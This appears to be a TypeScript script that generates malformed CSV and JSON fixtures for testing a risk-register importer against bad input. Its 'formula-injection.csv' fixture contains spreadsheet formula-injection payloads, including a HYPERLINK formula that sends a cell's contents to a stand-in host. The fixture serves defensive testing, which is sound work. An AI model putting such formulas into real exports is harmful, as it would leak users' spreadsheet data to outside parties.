/**
 * Generates the malformed fixtures the importer has to survive.
 *
 * Written as exact byte sequences rather than as strings in a test, because
 * several of them are about bytes: a lone carriage return inside a quoted
 * field, a UTF-8 BOM, a file that ends mid-quote. A test that constructed
 * them from a template literal would be testing the template literal.
 *
 * `.gitattributes` marks this directory binary so that line-ending
 * translation on a Windows checkout cannot repair the very thing they exist
 * to test.
 *
 *   node scripts/make-fixtures.ts          write them
 *   node scripts/make-fixtures.ts --check  fail if they differ
 */

import { mkdirSync, readFileSync, writeFileSync } from 'node:fs'
import { dirname, join } from 'node:path'
import { fileURLToPath } from 'node:url'

const root = join(dirname(fileURLToPath(import.meta.url)), '..')
const dir = join(root, 'fixtures', 'malformed')

const BOM = '﻿'
const CR = '\r'

interface Fixture {
  readonly name: string
  readonly why: string
  readonly content: string
}

const FIXTURES: readonly Fixture[] = [
  {
    name: 'unterminated-quote.csv',
    why: 'A quoted field that never closes. Everything after it would otherwise be read as one enormous value, silently destroying the rest of the register.',
    content: 'id,title,likelihood,impact\nR-1,"never closed,2,5\nR-2,fine,3,3\n',
  },
  {
    name: 'bom-and-crlf.csv',
    why: 'What Excel on Windows actually writes. The BOM must not become part of the first column name.',
    content: `${BOM}id,title,likelihood,impact\r\nR-1,Ransomware,2,5\r\nR-2,Phishing,5,2\r\n`,
  },
  {
    name: 'lone-cr-in-field.csv',
    why: 'A bare carriage return inside a quoted field, produced by a paste from a Mac-era tool.',
    content: `id,title,likelihood,impact\nR-1,"line one${CR}line two",3,3\n`,
  },
  {
    name: 'ragged-rows.csv',
    why: 'Rows that are short and rows that are long. Both are padded or truncated and reported, rather than rejecting a register that is three columns ragged on row 900.',
    content: 'id,title,likelihood,impact\nR-1,short\nR-2,long,3,3,extra,more\nR-3,fine,4,2\n',
  },
  {
    name: 'formula-injection.csv',
    why: 'Every character that makes a spreadsheet treat a cell as a formula, in fields that are echoed into the exports.',
    content: [
      'id,title,description,likelihood,impact',
      'R-1,"=HYPERLINK(""https://example.invalid/?""&A1,""click"")",ordinary,3,3',
      'R-2,+1+1,"@SUM(A1:A9)",4,2',
      'R-3,-2+3,"\tleading tab",2,4',
      '',
    ].join('\n'),
  },
  {
    name: 'out-of-range-levels.csv',
    why: 'Levels outside the configured scale, non-numeric levels, and blanks. Each must be reported as a different kind of problem.',
    content: [
      'id,title,likelihood,impact',
      'R-1,seven,7,3',
      'R-2,not a number,N/A,3',
      'R-3,blank,,3',
      'R-4,fractional,3.5,3',
      'R-5,zero,0,3',
      '',
    ].join('\n'),
  },
  {
    name: 'inverted-intervals.csv',
    why: 'Quantitative bounds the wrong way round, half-open, and negative. None may be silently repaired.',
    content: [
      'id,title,likelihood,impact,freq min,freq max,loss min,loss max',
      'R-1,backwards,3,3,10,1,5000,500',
      'R-2,half open,3,3,1,,500,5000',
      'R-3,negative,3,3,-1,4,-500,5000',
      '',
    ].join('\n'),
  },
  {
    name: 'empty.csv',
    why: 'Zero bytes.',
    content: '',
  },
  {
    name: 'header-only.csv',
    why: 'A header with nothing beneath it, which is what a filtered export produces.',
    content: 'id,title,likelihood,impact\n',
  },
  {
    name: 'blank-header.csv',
    why: 'A first row of empty fields, so there are no column names to map.',
    content: ',,,\nR-1,x,3,3\n',
  },
  {
    name: 'not-json.json',
    why: 'A trailing comma, which is the commonest reason a hand-edited export fails to parse.',
    content: '{"risks":[{"id":"R-1","likelihood":3,"impact":3},]}\n',
  },
  {
    name: 'json-not-a-list.json',
    why: 'Valid JSON containing no list of risks.',
    content: '{"total": 4, "generatedBy": "some GRC tool"}\n',
  },
  {
    name: 'json-wrapped.json',
    why: 'The four wrappers GRC exports choose between. All four must be unwrapped.',
    content: `${JSON.stringify(
      { items: [{ id: 'R-1', likelihood: 3, impact: 4, title: 'Wrapped' }] },
      null,
      2,
    )}\n`,
  },
]

function main(): void {
  const check = process.argv.includes('--check')
  mkdirSync(dir, { recursive: true })

  const index = FIXTURES.map((f) => `${f.name}\n  ${f.why}`).join('\n\n')
  const readme = `# Malformed fixtures

Generated by \`scripts/make-fixtures.ts\`. Do not edit by hand.

Each file is an exact byte sequence the importer has to survive. They are
marked binary in \`.gitattributes\` so a checkout cannot silently repair them.

${index}
`

  let failed = false
  const write = (path: string, content: string): void => {
    if (!check) {
      writeFileSync(path, content, 'utf8')
      return
    }
    let actual: string
    try {
      actual = readFileSync(path, 'utf8')
    } catch {
      console.error(`missing: ${path}`)
      failed = true
      return
    }
    if (actual !== content) {
      console.error(`stale: ${path}. Run: node scripts/make-fixtures.ts`)
      failed = true
    }
  }

  for (const fixture of FIXTURES) write(join(dir, fixture.name), fixture.content)
  write(join(dir, 'README.md'), readme)

  if (check) {
    if (failed) process.exit(1)
    console.log(`fixtures up to date (${FIXTURES.length} files)`)
    return
  }
  console.log(`wrote ${FIXTURES.length} fixtures to fixtures/malformed`)
}

main()
